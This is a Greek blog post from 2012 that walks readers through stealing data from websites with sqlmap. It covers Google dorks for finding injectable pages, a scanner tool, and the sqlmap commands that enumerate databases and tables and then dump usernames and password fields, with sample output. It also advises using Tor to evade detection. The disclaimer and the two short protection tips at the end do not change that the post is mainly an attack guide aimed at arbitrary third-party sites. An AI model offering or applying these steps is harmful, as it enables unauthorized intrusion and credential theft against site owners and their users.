ΠΡΟΣΟΧΗ
Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι
Δευτέρα 16 Ιανουαρίου 2012
Πως να κλεβετε στοιχεια απο ιστοσελιδες (SQLmap)
Αυτος ο οδηγος ειναι παρανομος δεν ευθυνομαι για κακοβουλη χρηση του *ΠΡΟΣΟΧΗ μπορουνε να σας εντοπισουνε και να διωχθειτε ποινικα αν επιτεθειτε σε σελιδα.
Τι θα χρειαστειτε;
1.Backtrack 5 R1
παμε στο google και κανουμε αναζητηση
.php?id= gr
θα μας εμφανισει ελληνικες και ξενες σελιδες που μπορει να ειναι ευαλωτες σε sql injection
επιλεγουμε και ανοιγουμε την σελιδα και στην url βαζουμε ' στο τελος
αν μας βγαλει
MYSQL warning
η Mysql syntax error τοτε ειναι 100% ευαλωτη
*η κατεβαζετε το text αρχειο με Google Dorks
download
το ανοιγετε κανετε αντιγραφη μια σειρας και επικοληση στην αναζητηση του Google
*η κατεβαζετε το XcodeExploitScanner
download
οταν το εχουμε κατεβασει κανουμε extract και μετα παμε στο
XcodeExploitScanner.exe δεξι κλικ και εκτελεση ως διαχειριστης
εκει που λεει Dork βαζετε τι τυπο σελιδας θελετε να ψαξει πχ αν θελετε για προιοντα inurl:product.php?mid= (θα σας βρει καποια που να σχετιζονται με προιοντα οχι ολα απλα ειναι ενας τροπος για να διαλεξεις που θα επιτεθεις) πατας dork it και σου εμφανιζει σελιδες
μετα Scan SQLi και ανιχνευει αν οι σελιδες ειναι ευαλωτες
πατατε στο Open results καντε αντιγραφη και καντε επικολληση σε ενα αρχειο text το οποιο θα μπορειτε να το κοιταξετε μετα με Backtrack
*περιπου καθε μια αναζητηση που κανετε πρεπει να πατατε Show Captcha να βαζετε οτι βλεπετε στην εικονα ετσι ωστε να μην μπλοκαρει την ip σας η Google
Ανοιγουμε ενα τερματικο και γραφουμε
cd /pentest/database/sqlmap
οποτε παμε στο τερματικο μας και γραφουμε
./sqlmap.py -u [url] --beep
πχ ./sqlmap.py -u
www.selidathyma.com./php?id=17
--beep
οταν ακουσετε ενα beep τοτε το sqlmap βρηκε ευαλωτη την σελιδα
μετα γραφουμε
./sqlmap.py -u [url] --dbs
πχ ./sqlmap.py -u
www.selidathyma.com./php?id=17
--dbs
θα μας εμφανισει τα Database πχ
available databases [6]:
[*] dswa
[*] dswa_stage
[*] dswawordpress
[*] information_schema
[*] mysql
[*] test
./sqlmap.py -u [url]
--tables -D [database]
μπορειτε να επιλεξετε οτι database θελετε και γραφετε παλι
πχ ./sqlmap.py -u
www.selidathyma.com./php?id=17
--tables -D dswa
Database: dswa
[104 tables]
+-----------------------------------+
| access
| accesslog
| actions
| actions_aid
| advanced_help_index
| authmap
| autologout
| batch
| blocks
| blocks_roles
| boxes
| cache
| cache_block
| cache_content
| cache_filter
| cache_form
| cache_menu
| cache_page
| cache_update
| cache_views
| cache_views_data
| comments
| content_access
| content_field_headername
| content_group
| content_group_fields
| content_node_field
| content_node_field_instance
| content_type_education_center_sub
| content_type_find_alliance
| content_type_member_home_page
| content_type_member_page
| content_type_page
| content_type_page_ns
| content_type_story
| dswa_chapters_main
| dswa_chapters_persons
| dswa_eventuity_additional
| dswa_eventuity_link
| dswa_eventuity_main
| dswa_profile_additional
| dswa_profile_geographic
| dswa_profile_images
| dswa_profile_main
| dswa_store_categories
| dswa_store_featured
| dswa_store_featured_sample
| dswa_store_images
| dswa_store_product_categories
| dswa_store_products
| dswa_taq_articles
| dswa_taq_quotes
| dswa_taq_tips
| dswa_taq_topics
| dswa_teleclasses_additional
| dswa_teleclasses_main
| dswa_teleclasses_speakers
| dswa_whatsnew_main
| dswa_whatsnew_order
| fckeditor_role
| fckeditor_settings
| files
| filter_formats
| filters
| flood
| history
| menu_custom
| menu_links
| menu_router
| node
| node_access
| node_comment_statistics
| node_counter
| node_revisions
| node_type
| performance_detail
| performance_summary
| permission
| profile_fields
| profile_values
| role
| search_dataset
| search_index
| search_node_links
| search_total
| semaphore
| sessions
| system
| term_data
| term_hierarchy
| term_node
| term_relation
| term_synonym
| upload
| url_alias
| users
| users_roles
| variable
| views_display
| views_object_cache
| views_view
| vocabulary
| vocabulary_node_types
| watchdog
+-----------------------------------+
./sqlmap.py -u [url] --columns -T [table name] -D [databasename]
πχ ./sqlmap.py -u
www.selidathyma.com./php?id=17
--columns -T user -D dswa
Database: dswa
Table: users
[19 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| access | int(11) |
| created | int(11) |
| data | longtext |
| init | varchar(64) |
| language | varchar(12)|
| login | int(11) |
| mail | varchar(64)|
| mode | tinyint(4) |
| name | varchar(60)|
| pass | varchar(32) |
| picture | varchar(255) |
| signature | varchar(255)|
| signature_format | smallint(6) |
| sort | tinyint(4) |
| status | tinyint(4) |
| theme | varchar(255)|
| threshold | tinyint(4) |
| timezone | varchar(8) |
| uid | int(10) unsigned |
+------------------+------------------+
./sqlmap.py -u [url] --dump -C [column] -T [table name] -D [databasename]
πχ ./sqlmap.py -u
www.selidathyma.com./php?id=17 --dump -C pass -T users -D dswa
πχ εγω τωρα στοχευσα να επιτεθω και να ανακτησω ολους τους κωδικους απο τα μελη που ειναι γραμμενα στην σελιδα
./sqlmap.py -u
www.selidathyma.com./php?id=17 --dump -C name -T users -D dswa
και εδω τα ονοματα που εκαναν εγγραφη σε αυτη την σελιδα
και ετσι κλεβετε διαφορες πληροφοριες απο μια σελιδα
*κακοβουλοι χρηστες κανουνε αυτη την επιθεση με την χρηση του Tor ετσι ωστε να μην εντοπιστουνε.
σχετικο αρθρο που μπορει να σας βοηθησει
εδω
η επιλογη --tor στο sqlmap χρησιμοποιει proxy και δεν μπορουν να σας εντοπισουν την ip
Πως θα προστετευτειτε;
1.Μην κανετε εγγραφη σε ευαλωτες σελιδες γιατι με αυτο τον τροπο θα κλεψουνε ονοματα/κωδικους και διαφορα προσωπικα στοιχεια σας τα οποια μπορουνε να χρησιμοποιησουνε για να εισβαλουνε στο συστημα σας η στην προσωπικη αλληλογραφια σας
2.Ποτε μην βαζετε προσωπικα δεδομενα σε σελιδες
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου
Νεότερη ανάρτηση
Παλαιότερη Ανάρτηση
Αρχική σελίδα
Εγγραφή σε:
Σχόλια ανάρτησης (Atom)
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου